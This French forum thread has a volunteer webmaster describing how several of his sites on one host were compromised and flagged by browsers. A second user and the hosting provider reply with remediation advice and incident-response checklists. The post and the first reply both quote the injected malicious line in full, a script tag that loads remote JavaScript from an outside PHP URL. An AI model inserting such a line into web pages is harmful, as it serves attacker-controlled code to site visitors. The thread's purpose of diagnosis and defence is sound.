Discussion :

[marcel marie]

BONJOUR,
Je ne sais vraiment pas où exposer ce problème et pourtant c'en est UN VRAI et particulièrement GÊNANT. MERCI pour votre aide afin de comprendre.

L'exemple dont je parle ici et qui est le fil conducteur est touteladanse.com hébergé chez AMEN . Nous travaillons ensemble sur ce site quotidiennement visité par environ 1000 personnes... J'ai eu le même problème avec deux autres sites chez AMEN : linteaux-de-france.com et letilt.fr, mais jamais ailleurs. Je n'ai jamais eu ce problème avec d'autres hébergeurs !!
Depuis ma retraite après près de 40 ans chef de projet en informatique je m'amuse à rendre service en construisant des sites bénévolement.
Le 30 septembre, dans la journée, à trois moments différents, les dates d'environ 1/3 des fichiers de mes sites ont été mises au 30/9.
Les mots de passe FTP de ces sites sont constitués de 10 caractères avec un mélange de : minuscules/majuscules, lettres, chiffres, caractères spéciaux et chaque site a évidemment son mot de passe propre.
A partir de cette date du 30/9 tous les navigateurs utilisés m'ont signalé : page malveillante avec toutes les injures d'accompagnement, avertissements et autres. Une seule combinaison "passait", XP avec I.E version 8.0.6001.18702.
Si on acceptait de poursuivre malgré l'avertissement des navigateurs ça se passait bien et apparemment aucun visiteur n'a eu d'ennui, virus, malwares ou autres. Ce qui évidemment n'est pas une solution pas plus que de changer le paramétrage du navigateur qui laisserait tout passer même les vraies erreurs.

Le logiciel qui trouve le problème est STOPBADWARE, créé par GOOGLE et qui s'active tout seul et surtout que l'on ne peut pas empêcher de s'exécuter. Si ce logiciel trouve les vraies anomalies, dit lesquelles et où, pourquoi pas !!!!! Mais là RIEN, "DÉBROUILLEZ-VOUS" semble être son unique crédo.

Pourquoi y a-t-il eu attaque de mes trois sites chez AMEN, le même jour, les mots de passe FTP de chacun étant tous nettement différents ?.
AMEN répond : Il y a du avoir une intervention malicieuse d'un robot sur votre hébergement FTP.
Nous vous conseillons donc de changer votre mot de passe FTP depuis votre espace client.
Ce qui n'apporte strictement à la résolution du problème ni aux Pourquoi ? pourquoi moi? pourquoi chez Amen? Pourquoi le même jour ?

Ce qui montre quand même un gros souci de sécurité chez AMEN. En local je protège mon ordinateur mais c'est bien à AMEN de protéger l'accès aux sites qu'il héberge et pour lesquels on paie !!!!! On peut donc rentrer "facilement" sur un site !!! Le propriétaire du site pourrait au moins être avisé de telles tentatives ?.
Bien entendu c'est de la faute de personne mais curieusement le matin du dimanche 5/10 tous mes sites sont à nouveau redevenus opérationnels avec Internet Explorer et FIREFOX !!
Par la suite d'autres visiteurs se sont manifestés avec des blocages avec Google Chrome, Safari ...

On n'a donc pas d'explications ni de solutions pour un tel problème qui peut se produire n'importe quand alors que tout allait bien jusque là.
Alors j'ai tenté une solution pour comprendre mais sans aucunement prévenir l'arrivée d'un tel souci.

J'ai redescendu sur mon ordi tous les fichiers du site "à problème" et j'ai passé un coup d'AVAST sur ce répertoire, copie donc du Site chez AMEN. Je n'ai pas AVAST et c'est un ami qui a fait la recherche de menaces ... sur le répertoire ainsi descendu.
Et là j'ai 8 fichiers qui me sont signalés en anomalie.
Et à chaque fois je constate l'insertion dans chaque script d'origine, à des emplacements variables, ici <head> de :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<!--b536eb--><script type="text/javascript" src="http://detergarden.it/pxh36vy4.php?id=11622847"></script><!--/b536eb-->

Dans cette ligne seuls varient : l'id et les caractères des deux commentaires de début et de fin ???!!!
AVAST m'annonce aussi l'anomalie dans deux fichiers qui n'existent pas, en tout cas que je ne vois pas, ni sur le site ni sur sa copie "descendue".

Ce long "discours" a effectivement pour but de préparer les questions et elles sont nombreuses !

1) d'une façon générale où peut-on exposer ce genre de problème "fonctionnement de l'informatique-internet" qui ne se rapproche pas des thèmes habituellement abordés?
2) comment ce genre de problème peut-il être évité : une procédure qui tout-à-coup ne fonctionne plus sans aucune modification des scripts ou autre? Est-ce du fait du programmeur ou de l'hébergeur? Celui-ci a-t-il mis en place chez lui les outils nécessaires au blocage des soi-disants robots espions/perturbateurs. Là mon souci est triple (trois sites concernés) le même jour chez l'hébergeur AMEN. Est-ce que cela se produit chez d'autres hébergeurs? Moi-même, pas plus que mes relations amateures ou professionnelles n'en ont jamais entendu parler !!
3) l'hébergeur n'a-t-il pas les moyens de "voir" l'attaque d'un robot? de nombreux fichiers qui changent de date (la même) au même moment! Robot ou humain on doit bien pouvoir savoir qui essaie de rentrer chez un hébergeur ou sur un site. Pour chacun des sites, à la seconde près, il s'agit de la même date ...
4) quand le mal est fait, comment effectuer les corrections, VITE et BIEN ?

Comme je l'ai fait, en agissant sur la totalité, AVAST trouve 8 menaces, dont 6 vraies mais "invente" deux fichiers qui n'existent pas. Sont-ils cachés? Je vais vérifier ... c'est mieux que rien mais en fait il y avait 99 fichiers perturbés dans un site. Partisan du moindre effort je n'ai pas supprimé les lignes ajoutées par le supposé robot et j'ai simplement récupéré ma version locale d'un des sites. Celui-ci , linteaux-de-france.com, semble maintenant passer sur les différents navigateurs (IE, google chrome, Firefox, Opera, Safari) et OS (XP, W7) installés chez moi.
J'attends les retours des utilisateurs et je procède de la même façon sur mes autres sites perturbés.

Par contre je ne sais pas comment trouver des lignes éventuellement ajoutées dans des fichiers qui ne sont pas du texte comme des images ou autres. Une table de ma base de données a été vidée !! Coîncidence ou effet du robot ??????????
Il y a quand même un sacré problème dans cette "apparition" de sites devenus dangereux par le seul fait d'un robot malicieux qui annonce des problèmes créés par lui !!
Moi j'incrimine AMEN. C'est le fautif, à mon sens, du fait qu'il laisse travailler de soi-disants robots malicieux. Il faut trouver la parade, encore plus malicieuse évidemment.

Bien cordialement, je vous remercie de votre compréhension et de votre aide. Imaginez la "CATA" !! s'il s'agissait d'un site vraiment important, commerçant ou administratif. Il ne faudrait pas que ça devienne une habitude, et pourtant je le crains. J'aurais été le cobaye.

Marcel Marie.

[cavo789]

Bonjour

Quel long descriptif

Donc : tu as des sites chez un hébergeur, tes sites sont présumés sain et, le même jour, à la même heure, paf', tous les sites sont virusés (puisqu'on parle bien d'un virus; à tout le moins d'un code malveillant).

Tout laisse à croire qu'en effet, il y a une faiblesse au niveau de l'hébergeur. Ce serait "sympa" de savoir si d'autres hébergés que toi ont connu la même mésaventure; ce qui donnerait plus de poids à l'affirmation précédente.

Ce que je présume : un site est attaqué, un virus est injecté et le virus peut remonter dans l'arborescence du serveur et se promener de sites en sites pour les attaquer. Si cette hypothèse est correcte, ton hébergeur ne fait pas le minimum qui est d'isoler chaque site les uns des autres. Et, si c'est le cas, cela va être difficile de te protéger puisque l'attaque ne viendrait pas par FTP ni par une URL mais depuis le serveur lui-même.

Je n'ai pas de solution à te proposer si c'est bien ainsi que cela se passe.

Note que ce serait vraiment un grave problème parce que cela veut dire que ce script "qui se promène" a donc accès à tes fichiers dont tes fichiers de configuration. Pas top top...

Il te faudrait jeter un oeil à tes logs Apache pour voir si tu n'y déceles rien mais, une fois encore, si l'attaque passe par le serveur lui-même, tes logs seront cleans.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<!--b536eb--><script type="text/javascript" src="http://detergarden.it/pxh36vy4.php?id=11622847"></script><!--/b536eb-->

Clairement une casse. Un script php externe qui va générer du contenu javascript dynamique (selon la valeur de ID).

1) d'une façon générale où peut-on exposer ce genre de problème "fonctionnement de l'informatique-internet" qui ne se rapproche pas des thèmes habituellement abordés?

Pour le cas suspecté ici, c'est à l'hébergeur a garantir, strictement, qu'un script stocké dans un dossier /public_html/siteweb1 ne puisse pas remonter au niveau de /public_html. Une manière de le faire est la clause open_base_dir du fichier php.ini mais, en tant qu'hébergeur, il y a bien d'autres garanties à mettre en place.

4) quand le mal est fait, comment effectuer les corrections, VITE et BIEN ?

Désinfecter un site = un travail d'heures. VITE n'existe pas.
La seule manière est de restaurer une ancienne version (depuis un backup) mais si le site avait été virusé; c'est qu'il est failible et donc le backup va permettre (s'il n'était pas déjà virusé) de remettre un site propre... qui se fera attaquer à nouveau.

Par contre je ne sais pas comment trouver des lignes éventuellement ajoutées dans des fichiers qui ne sont pas du texte comme des images ou autres.

Utilise un comparateur de fichiers;, par exemple winmerge. Il te faut donc une copie saine du fichier.
Tu as aussi windif (si je ne me trompe pas sur le nom) qui compare un dossier par rapport à un autre.

Maintenant, à côté du problème "serveur", as-tu la moindre protection sur ton site ? J'entends par là un logiciel parefeu, en amont de ton site, et qui bloquerait les attaques par url ? Si pas, il t'en faut un. C'est comme un antivirus, tu n'irais pas sur le net sans un bon antivirus; même chose pour un site web qui ne devrait pas être accessible sans avoir un parefeu devant.

Bonne journée.

[marcel marie]

Bonjour,
Je vous joins la réponse de AMEN .... si vous avez le courage de la lire !!!
Ils ratissent large. C'est un vrai cours mais ça ne s'occupe aucunement de mon problème. Ils y parlent essentiellement de produits ou autres dont je n'ai jamais entendu parler (PLESK ...) ou que je n'utilise pas (CMS ...). Ils disent être protégés "en principe".
Si une telle note était présentée à un potentiel informaticien avant de créer un site, je crois qu'il préférerait se mettre aux Dames ou au Bridge !!!
Ils veulent un dénominateur commun et c'est simple : moi, chez AMEN, trois sites chez eux, perturbés le même jour, et rétablis (quasiment) le même jour.
La Fontaine disait "LA RAISON DU PLUS FORT EST TOUJOURS LA MEILLEURE".
Il n'y est proposé AUCUNE SOLUTION (dém??dez-vous) lorsque le problème est survenu; Et pour tenter de l'éviter : "l'acquisition d'un logiciel payant évidemment".
Je pense que je vais les quitter au renouvellement. Il est possible aussi que ce soit ce que j'appelais autrefois quand j'étais chef de projet une réponse psychologique c'est-à-dire que lorsque l'on m'annonçait un problème je répondais au client "NON NON ce n'est pas NOUS, NOUS n'y sommes pour rien"; mais bien entendu, sans le dire nous cherchions la raison et .... trouvions "généralement" la SOLUTION. Le miracle en quelque sorte !!!!!
Merci pour votre aide. N'hésitez pas à parler de cet incident avec vos collègues informaticiens. Malheureusement dans la vie courante (garagiste, fournisseur internet, etc ...) on a également le même genre de réponse "Mais mon pauvre Monsieur, vous n'avez pas de chance, ça n'arrive qu'à VOUS".
Bien Cordialement.
Marcel Marie.
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
VOICI Les réponses d'AMEN, par deux techniciens différents sur le même sujet.Bonjour,

Si plusieurs site ont été attaqués en même temps il faudrait trouver le dénominateur commun.
CMS utilisé ?
Code PHP identique ?

Pour le nettoyage c'est assez difficile.
Un site web pour vous aider: http://sitecheck.sucuri.net/
Sitelock est une solution proposé par amen.
Il en existe beaucoup d'autre qui serons très efficace sur une attaque ScriptKiddies, plus difficile si le piratage à été fait sur mesure.
Sur un serveur dédié un comparateur de fichier peux être assez efficace mais long à gérer.
J'espère avoir répondu à toute vos questions, je vous joint le même type de message que nous envoyons à nos clients de serveurs dédiés.
Cordialement
Vincent


PS: Information serveur dédiés:

-Sur votre machine chez vous ou dans votre bureau:
1. Réaliser un scan de vos machines bureautiques (Certain malware utilise les comptes FTP pour déposer des pages malicieuses sur vos hébergements).

-Sur votre serveur :si notre équipe du centre de données le consent, nous allons remettre en ligne votre serveur pour un temps limité. Attention! vous devrez impérativement désactiver tous les services actifs sur votre serveur (ainsi votre serveur ne sera plus impliqué dans les problèmes indiqués préalablement). Aussi, si vous souhaitez que nous vous assistions dans ces démarches, vous pouvez nous autoriser un accès administrateur à votre serveur.

1. Vérifier quels logiciels sont installés antivirus/firewall/spyware, et nous indiquer s'il sont bien activés :
-Réaliser la liste des programmes installés sur votre serveur, ports ouverts, processus actifs. (exemple d'outils: netstat -na / GNU/Linux: paquets installés / Windows : http://technet.microsoft.com/en-us/sysinternals, ou par les commandes suivantes dans PowerShell: Get-WmiObject -Class Win32_Product | Select-Object -Property Name > liste.txt).
-Faire les mises à jours non effectuées.
2. Analyse du système d'exploitation pour détecter les piratages "simples" :
-Réalisez une vérification de l'ensemble de votre serveur: rootkit, scripts malicieux,.... (exemple d'outils: AntiVirus / GNU/Linux: Chkrootkit, rkhunter, clamav, ... / Windows: Microsoft Baseline Security Analyzer, Microsoft Malicious Software Removal Tool,...).
-Vérifiez si des parties du système ont été modifié. (GNU/Linux: debsums,.../ Windows: HiJackThis, ccleaner,...).
3. Sauvegarde de vos données sur un autre serveur. (Hors mode KVM) :
-Réalisez des sauvegardes de l'ensemble de votre serveur sur une de vos machines. (Préparer une éventuelle réinstallation).
4. Changer les mots de passe, utilisateurs systèmes, FTP, Email... :
-Changez l'ensemble de vos mots de passe, en utilisant au minimum 10 caractères, avec les minuscules et des majuscules, des chiffres, et des caractères spéciaux.
5. Vérifier la configuration des logiciels serveurs :
-Utilisez des outils, suivant le service (Serveur de mail: http://www.mailradar.com/openrelay/ ,...).
6. Vérifier les sites web: injections, modifications :
-Vérifiez la programmation de vos sites (Scripts avec vulnérabilités, upload de fichier sur des répertoires exécutable, permis, ...).
-Vérifiez si vos données n'ont pas été modifiées.
-Téléchargez l'ensemble de vos fichiers (effectué au point nº3) et lancez une analyse avec un antivirus des fichiers sur votre ordinateur.
-Mettre en place des outils de vérifications de modifications des fichiers. (AIDE,...).

Une fois le problème résolu:
-----------------------------
S'il s'agissait de problèmes de SPAM, nous vous conseillons de vérifier que votre serveur à bien été retiré des listes noires
Voici deux liens pour vous y aider:
http://www.dnsbl.info/dnsbl-database-check.php
http://multirbl.valli.org/


Pour éviter des problèmes d'abus dans le futur, nous vous conseillons les points suivant :

-Mise à jours des logiciels CMS, OS, ...
-Désactiver tous les services que vous n'utilisez pas.
-Vérifier la configuration des services que vous utilisez.
-Firewall en place.

-Mettre en place des outils pour limiter les forces butes (Linux: fail2ban, ...).
-Mettre en place des outils de vérification d'intégrité des données (Linux: Aide, ...)

-Vérification si un navigateur peut accéder aux répertoires UPLOAD de PHP.
-Vérification des formulaires.
-Vérification de la programmation en général.

-Abonnement à des listes de diffusion sur les alertes de vulnérabilité: OS, CMS, ...

Si vous avez Plesk :
--Dans le menu de gauche cliquer sur "Outils et paramètres".
--Dans le Menu "Sécurité", cliquer sur le premier sous menu "Politique de sécurité".
--Régler la "Complexité min. des mots de passe" sur "Forte".


Si la version de Plesk que vous avez est inférieure à la 12.0.18, il est possible de l'actualiser et d'activer certains modules de protection (maintenant proposés en standard) :
-modSecurity.
-Fail2ban.
-Limites d'envois de mails.
Dans votre Plesk :
Onglet "serveur", sous onglet "Outils et Paramètres", dans le sous menu "Parallels Panel", cliquer sur la sixième ligne "Mises à jour et à niveau".
Cliquer sur "Installer ou mettre à niveau le produit" puis sur "continuer"
Patientez jusqu'à la fin de l'actualisation.

Sinon, vous pouvez utiliser un proxy applicatif, pour filtrer/limiter les attaques notamment si vous utilisez des CMS pas tout à fait à jour. Plusieurs sociétés proposent ce type de produit, comme Amen avec SiteLock. Vous pouvez contacter le service commercial qui pourra vous conseiller.

===========
Les navigateurs récents utilisent des filtres pour protéger les utilisateurs.
Chaque navigateur utilise leur propre organismes de filtre.
Lorsqu'un robot comme celui de google détecte un malware, le site est ajouté dans les sites potentiellement dangereux, et une alerte est affichée par le navigateur.



Concernant la mise en place du code malicieux, c'est assez difficile de répondre, en principe notre plateforme est protégé au niveau du système et des logiciels serveurs utilisés, voici les indications que nous donnons à nos clients lorsque nous détectons ou recevons des alertes sur des sites.
En résumé il faut aussi vérifier le CMS si vous en utilisez un, les droits sur les répertoires, et le code de vos pages webs...




Voici quelques indications afin de détecter l'origine du problème.

-Sur votre machine chez vous ou dans votre bureau :
1. Réaliser un scan de vos machines bureautiques (Certain malware utilise les comptes FTP pour déposer des pages malicieuses sur vos hébergements).

Sur votre hébergement,

1. Changer les mots de passe, FTP, Email, de vos applications WEB... :
-Changez l'ensemble de vos mots de passe, en utilisant au minimum 10 caractères, avec les minuscules et des majuscules, des chiffres, et des caractères spéciaux.
2. Vérifier les sites web: injections, modifications :
-Vérifiez la programmation de vos sites (Scripts avec vulnérabilités, upload de fichier sur des répertoires exécutable, permis, ...).
-Vérifiez si vos données n'ont pas été modifiées.
-Téléchargez l'ensemble de vos fichiers et lancez une analyse avec un antivirus des fichiers sur votre ordinateur.

Voici les causes possibles d'un tel problème :
-Vous ou vos clients avez crée une page contenant un logiciel malveillant / malware.
-Les mots de passe que vous ou vos clients utilisent, sont trop simples et ont été "devinés".
-Une page web est trop permissive et peut être utilisée pour injecter/uploader des fichiers malicieux.
-Une de vos machines à été piratée et des programmes ou des pages ont été installées sur votre hébergement.
-...

Nous essayons de tout mettre en œuvre pour avoir une plate-forme sécurisée :
-Mise à jour des logiciels CMS, OS, ...
-Vérifier la configuration des services.
-...

Cependant, la sécurité doit aussi être prise en compte sur les CMS que vous utilisez, et au niveau de la programmation de votre site web :
-Vérification si un navigateur peut accéder aux répertoires UPLOAD de PHP.
-Vérification des formulaires.
-Vérification de la programmation en général.

Les attaquants sont imaginatifs et de nouvelles manières d'attaquer apparaissent régulièrement, qui peut prendre en défaut les deux derniers points indiqués dans ce mail.
Une façon de mitiger ce dernier point est de s'abonner à des listes de diffusions sur les alertes de vulnérabilité.


A la fin du problème nous envoyons ce deuxième courrier:
--------------------------------------------------------
Je me permets de vous informer que nous avons un nouveau produit qui permet d'être informé et protégé sur de futur intrusions sur vos produits d'hébergement et bases de données.
http://www.amen.fr/sitelock/

Afin d'éviter que cela se reproduise dans le futur, nous vous conseillons les points suivant :
- Avoir toujours à jour vos CMS.
- Modifier tous les mots de passe, (FTP, accès CMS, ...), en utilisant au minimum 10 caractères, avec des minuscules et des majuscules, des chiffres, et des caractères spéciaux.
- Contrôler vos machines locales (Anti-Virus, Anti-Spyware)

Nous restons à votre disposition pour tout renseignement complémentaire.